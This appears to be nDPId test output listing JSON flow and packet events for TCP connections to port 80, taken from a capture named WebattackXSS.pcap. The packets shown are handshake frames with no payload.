-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347110266,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347110266,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u39AAD4GClGsEAABwKgKMtHWAFDeH8hWAAAAAKACchByBAAAAgQFtAQCCAoBOXMpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0dbJG1vv3h\/IV6AScSAFVQAAAgQFtAQCCAoD40SgATlzKQEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1499347110267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347110267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u4BAAD4GClisEAABwKgKMtHWAFDeH8hXyRtb8IAQAOWkXAAAAQEICgE5cykD40Sg"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347111565,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347111565,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ioRAAD4GO0ysEAABwKgKMtHkAFDzev7qAAAAAKACchAkwgAAAgQFtAQCCAoBOXRuAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0eR9BdLY83r+66AScSCL+wAAAgQFtAQCCAoD40XkATl0bgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1499347111565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ioVAAD4GO1OsEAABwKgKMtHkAFDzev7rfQXS2YAQAOUrAwAAAQEICgE5dG4D40Xk"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347114111,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347114111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8emxAAD4GS2SsEAABwKgKMtH+AFCQhwyGAAAAAKACchB3hAAAAgQFtAQCCAoBOXbqAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1499347114111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0f6FLaNRkIcMh6AScSADoAAAAgQFtAQCCAoD40hhATl26gEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1499347114112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347114112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0em1AAD4GS2usEAABwKgKMtH+AFCQhwyHhS2jUoAQAOWipgAAAQEICgE5dusD40hh"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347115408,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347115408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N6NAAD4Gji2sEAABwKgKMtIMAFCkuE+MAAAAAKACchAe+gAAAgQFtAQCCAoBOXgvAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1499347115408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0gwQkJx6pLhPjaAScSAlRgAAAgQFtAQCCAoD40mlATl4LwEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1499347115409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347115409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N6RAAD4GjjSsEAABwKgKMtIMAFCkuE+NEJCce4AQAOXETQAAAQEICgE5eC8D40ml"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347116705,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347116705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FEVAAD4GsYusEAABwKgKMtIaAFCixG02AAAAAKACchAB8gAAAgQFtAQCCAoBOXlzAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1499347116705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0hqTGb4kosRtN6AScSBixgAAAgQFtAQCCAoD40rpATl5cwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1499347116706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347116706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FEZAAD4GsZKsEAABwKgKMtIaAFCixG03kxm+JYAQAOUBzgAAAQEICgE5eXMD40rp"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347119336,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AVBAAD4GxICsEAABwKgKMtI0AFAiVX1VAAAAAKACchBvlgAAAgQFtAQCCAoBOXwFAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0jRzeBsiIlV9VqAScSCQfAAAAgQFtAQCCAoD4017ATl8BQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AVFAAD4GxIesEAABwKgKMtI0AFAiVX1Wc3gbI4AQAOUvhAAAAQEICgE5fAUD4017"} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347120603,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347120603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA815JAAD4G7j2sEAABwKgKMtJCAFDFAarTAAAAAKACchCeIQAAAgQFtAQCCAoBOX1BAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0kIa0KsLxQGq1KAScSCGiQAAAgQFtAQCCAoD4064ATl9QQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA015NAAD4G7kSsEAABwKgKMtJCAFDFAarUGtCrDIAQAOUlkQAAAQEICgE5fUED4064"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347123174,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347123174,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j6NAAD4GNi2sEAABwKgKMtJcAFBy9vBnAAAAAKACchCn+wAAAgQFtAQCCAoBOX\/EAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1499347123174,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0lx1HkCocvbwaKAScSCd9QAAAgQFtAQCCAoD41E7ATl\/xAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1499347123175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347123175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j6RAAD4GNjSsEAABwKgKMtJcAFBy9vBodR5AqYAQAOU8\/QAAAQEICgE5f8QD41E7"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347124454,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347124454,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NtZAAD4GjvqsEAABwKgKMtJqAFC8CbfSAAAAAKACchCWLwAAAgQFtAQCCAoBOYEEAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0moH9pX9vAm306AScSCivAAAAgQFtAQCCAoD41J7ATmBBAEDAwc="} 
